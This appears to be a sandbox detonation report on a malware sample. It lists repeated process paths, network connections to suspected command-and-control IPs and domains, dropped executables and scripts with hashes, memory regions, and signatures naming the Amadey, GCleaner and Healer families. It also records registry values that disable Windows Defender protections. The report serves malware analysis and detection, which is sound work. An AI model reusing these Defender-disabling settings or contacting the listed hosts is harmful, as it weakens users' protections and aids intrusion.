C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

"C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 91.214.78.34:5556 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.96.1:443 croprojegies.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 213.209.150.137:4260 towerbingobongoboom.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.187.206:443 www.youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 142.250.200.46:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
N/A 127.0.0.1:49682 tcp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
N/A 127.0.0.1:49689 tcp

Files

C:\Users\Admin\AppData\Local\Temp\CwH7cSt1O.hta

MD5 83870c774e8ca5718b8c672497903acd
SHA1 03b421742542ed63c035309b6d7ee99e04db3b81
SHA256 2b95c7d4a7ab28cb2d460168efff4a8c3b56cc2c13fea492d5f8ba2ae71ef2d9
SHA512 74080c52e29839d305f3c68a3702e422b230bc825ffafcdf797ac3b875e18430165dfc66550c8f8bc2b50bf63d4f8e3f4f17c6ba6567e81aeadfdf6801ff6b6c

\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/2100-13-0x00000000065A0000-0x0000000006A62000-memory.dmp

memory/2948-14-0x0000000000B20000-0x0000000000FE2000-memory.dmp

memory/2948-29-0x0000000000B20000-0x0000000000FE2000-memory.dmp

memory/1276-30-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/1276-32-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/1276-33-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\35B0.tmp\35B1.tmp\35B2.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KFM2M0FY7T238EOLHP4W.temp

MD5 cc9fc5b035897ab99998c55cc0ccc5b9
SHA1 a834b7d4fdebc50913980b9639322e118d09fab6
SHA256 983e5a5871ea24b9a133999ca7870f5788b720db6878377c86d3cbbaf7136ad9
SHA512 eba036a1a5b82de94f2750a21e3cfb03f2fee12737491f573f9b4fbf541749808de620d1dbb95bf92345cf8d4cd4bfee69adb5b855211a33149a593414f59ee7

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2052-55-0x000000001B660000-0x000000001B942000-memory.dmp

memory/2052-56-0x00000000029E0000-0x00000000029E8000-memory.dmp

memory/1784-62-0x000000001B630000-0x000000001B912000-memory.dmp

memory/1784-63-0x0000000002250000-0x0000000002258000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/1276-87-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/1440-104-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2176-103-0x0000000004320000-0x0000000004760000-memory.dmp

memory/2176-105-0x0000000004320000-0x0000000004760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

MD5 ff130f0907781b9b0564a2e34350bda9
SHA1 968fd9f8787bda595df9a1670d28e8b129bbea99
SHA256 820ab89ef3e39e2ec7f7322c4710a7fbb1cc01b5cc28043f607f30312119a1b5
SHA512 8e5feb41fcfdf2366c8da4fda8d37eb29defb839689cacfdaf50d03604447e18e9cf83f31d90f7f48fce0ad40add335cf85b0c3b135de396e5971c19fd239e1f

\Users\Admin\AppData\Local\Temp\Build.exe

MD5 a94e37aebedaf87a3763e1c7766b5940
SHA1 d9064a5ec1ea7957cdde14a26e8b58ec9981fb0a
SHA256 7ee9298b5c6f9e90309c31684e030960cac17d71ca1316a2493843ef35d2cd70
SHA512 a82cf09a3048278b7439aedd6b2a9c5c4b528d42b5650881c88b39bc3cd4d40f995dbec2d8a2b8e1f4fc8e0e041b27f932b36fd67a4da268e5dd9f479517c948

C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs

MD5 3811496e1794473ea967dcd32594ccbb
SHA1 80d98553d718103ce5d52cacd64367d71ba4edd5
SHA256 477a23adf9b2e3b1b595dde107ee8f1a409671491e74b21e5ffdb0062525fc0d
SHA512 9cefbd14f7a3343c164397972d177c32b7ca5f72127c34481d02068ef4c78825cf40208b8e6869535726cdf6852b55b9d89d6850bf42af50c746de494a1185c3

memory/2720-133-0x0000000000360000-0x00000000003F4000-memory.dmp

memory/1276-142-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108470101\dafb180ffe.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

C:\Users\Admin\AppData\Local\Temp\198XEs4pd.hta

MD5 3b4085557dd9c4fcdac5b5994ab14920
SHA1 cbf141715a258f87538afe8bdd6fe79a87714092
SHA256 1894e7f9b9c7e15305675c1ad14abf7c31bb8da73c8fdbc5265e0af8b8847e8d
SHA512 b261643e3add67d91f1fb71e3ee2081ba2ec4b28a792ed647edf158423f2511acf4c4b2a8f2232094ecfb63bca4870b6ff36382b3de92d62767ae8c3102081b2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 425c45ed7dab1d42ad932d4dc0ef777a
SHA1 bcd76a73ade0917256298ae5d9ad19be5fc76dde
SHA256 f44ea65f2b68da56bd1c7c76dc5100ee60cc745259147cfa809da2012c945dbc
SHA512 44625d7a0840432515ece96eb54288737a9b60b68b2f44234e697c1487dbbe585798a000c384d4c929b38006effd49011c07e8980c870acf0b8d4472f6f9cb13

memory/2176-163-0x0000000004320000-0x0000000004760000-memory.dmp

memory/1440-164-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1440-165-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2176-166-0x0000000004320000-0x0000000004760000-memory.dmp

\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/2440-178-0x0000000006600000-0x0000000006ABC000-memory.dmp

memory/1728-177-0x00000000003E0000-0x000000000089C000-memory.dmp

memory/2440-176-0x0000000006600000-0x0000000006ABC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/1728-195-0x00000000003E0000-0x000000000089C000-memory.dmp

memory/1276-196-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 e22acf63349fa350c506a73b1d9b0a72
SHA1 80433423cb294e8c96be48896a7e34a5660220c5
SHA256 50816bcc9b3540f7d0d2a0f39d1d00c8e426ea699329170bc5659619fb04de03
SHA512 bfab3f1f5bca3e35883e8afc9b57441188063ad3dc50b18369251fcc114283dd1defe05a62a2b27a765b033ce8671764b7dd2f01dd54d6ea04bd3d365896cc58

C:\Temp\CImJpZO5X.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

MD5 19d2fe8a5d6c2174fb2a5c54e98523e0
SHA1 8e0a2cf8cbff8c169cba1e0a3785083ebeb5a627
SHA256 8a12b05f92dbb47d713dbc73cccccb089fc88f6ba96b5a64f42aaf6431e5616e
SHA512 3ff858f79a4e55f6728369b0f0d6de6060dbc4728ab21e5c352c209ef92b203f3039a623118706227ac61f75ab8b68ae4958d7939a000729de0890b54706ca95

memory/2920-228-0x0000000000070000-0x00000000000F4000-memory.dmp

memory/2516-230-0x00000000010A0000-0x000000000155C000-memory.dmp

memory/2500-229-0x00000000065C0000-0x0000000006A7C000-memory.dmp

memory/2516-237-0x00000000010A0000-0x000000000155C000-memory.dmp

memory/1440-238-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1276-239-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/1276-255-0x0000000006BC0000-0x00000000075AD000-memory.dmp

memory/2424-257-0x0000000001070000-0x0000000001A5D000-memory.dmp

memory/1276-254-0x0000000006BC0000-0x00000000075AD000-memory.dmp

memory/1440-258-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1276-259-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

C:\Windows\Tasks\Test Task17.job

MD5 a534e5d6857dc01f2d5ede74977bee11
SHA1 f05f2c5b6273c4b71b339b65d9fbb92e9ff45329
SHA256 2d043fbdfe99dbfc0674efba9a46d44bacf24f22f71c0bb6f0474624fd0b7922
SHA512 86ad2cdde20c9eaa62f44c9dacc1474b3ed3bee78f053bba0f90e3ebdfb7aa4a3b9f0b2b0e9adb0106c97c51ae6ac37d25e261fe83b75483b7a7713ff2d0f96d

memory/2208-275-0x00000000003A0000-0x0000000000418000-memory.dmp

memory/1276-277-0x0000000006BC0000-0x00000000075AD000-memory.dmp

memory/2424-278-0x0000000001070000-0x0000000001A5D000-memory.dmp

memory/2424-279-0x0000000001070000-0x0000000001A5D000-memory.dmp

memory/1440-280-0x0000000000400000-0x0000000000840000-memory.dmp

memory/18248-281-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2424-284-0x0000000001070000-0x0000000001A5D000-memory.dmp

memory/18248-282-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1276-285-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/18248-289-0x0000000010000000-0x000000001001C000-memory.dmp

memory/1232-293-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1440-295-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1276-297-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6G4X5UFP\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/1232-299-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1440-302-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1440-305-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1276-306-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/1232-308-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108730101\3ba3170154.exe

MD5 84ada09d9801547265d6589b50051295
SHA1 fa842424381715851e8d8d716afb27da31edd8c1
SHA256 a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA512 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f

memory/1276-324-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108740101\199631f9f1.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/1232-339-0x0000000000400000-0x0000000000840000-memory.dmp

memory/88132-346-0x0000000000DE0000-0x0000000001A13000-memory.dmp

memory/117412-347-0x0000000000400000-0x000000000042F000-memory.dmp

memory/88132-348-0x0000000000DE0000-0x0000000001A13000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108750101\cc8a07414f.exe

MD5 30305d29528f3aca3b09636d919bd512
SHA1 4af875a29e249da70f2da3519334af8fd584c193
SHA256 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512 a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarAF98.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/1276-432-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/103432-434-0x00000000009F0000-0x0000000000E85000-memory.dmp

memory/103432-435-0x00000000009F0000-0x0000000000E85000-memory.dmp

memory/1232-436-0x0000000000400000-0x0000000000840000-memory.dmp

memory/118420-438-0x0000000000990000-0x0000000000C9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108760101\05bb15ddb8.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/143532-453-0x0000000000DB0000-0x0000000001438000-memory.dmp

memory/1276-454-0x0000000000C70000-0x0000000001132000-memory.dmp

memory/1232-456-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108770101\f727984381.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/1276-479-0x0000000000C70000-0x0000000001132000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\db\data.safe.bin

MD5 ee9551fd3ceadc13b0fd293ebcc9732f
SHA1 b30de55764346440bd7453c20c69bb0da1dc92aa
SHA256 b42dbd6e7282fe030b840f97ef41ea4fe3caeb7a07cb3741b83ade850dd386a6
SHA512 460c59b2824f7ade51b896623a962578811ee6f04d1278990732e52889ecb38a44da7095d41d93a93b9fbb0937c5bed4c981d8124d96b0449e2b005cbb641f3c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\datareporting\glean\pending_pings\776a7bc8-20f1-4adc-8eb6-6500a6b6b651

MD5 938c95c7287d43561eec60b298c32534
SHA1 c4c3e0c86ef261dbb575fe9e5623ae03b3a8d571
SHA256 8b7589d0c919733f8d0f4256a50952f97c5cce2f5683e82e24619a0aa7635b89
SHA512 8fc5815874bb75571837523b896db66d0de121120b6b2cd9533cf8cb207975411d88b6e2e429d055f2ecd1bd4e8281b2c62db4bff11999b0595b10c9ee10105d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp

MD5 8080d67858e6aa2ff7494de5d87065ad
SHA1 0b00b28f5c576f320782dac630a0fa7a49570eb7
SHA256 03f524fdb067da9110f836efd94015ecaf1060db4df3d2f79d37751e8b36ff64
SHA512 02117fb15133b0f0c23461dcde7a5664922184f7f34e00aa2719887c489b0ab86db31920c74387422515f6e90020a7b900741e4b3ee4ea12906ba98b2d2cbcbf

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

memory/1232-599-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108780101\05f820f2c0.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/174240-620-0x00000000009B0000-0x0000000000DFE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

MD5 734f514c13b0c062b22b12e7d426e8c6
SHA1 8e3396b435e16213d9a7d81667aabb249b5da14f
SHA256 5f4dff1956a7f0ed64326d020715f4cd72d5f7b75e414b0b887b454fff498b5e
SHA512 af7bc2c66070c968ccacc0c80556144f9c8445a0b02bf1d04f2040fa7353e24cd8e290df27aa6890f7f2fc6ed74e8744d1bd1496f8bf38e58ebcca8b4854fedc

memory/174240-617-0x00000000009B0000-0x0000000000DFE000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 01:21

Reported

2025-03-06 01:24

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\dd29a77f54.exe N/A
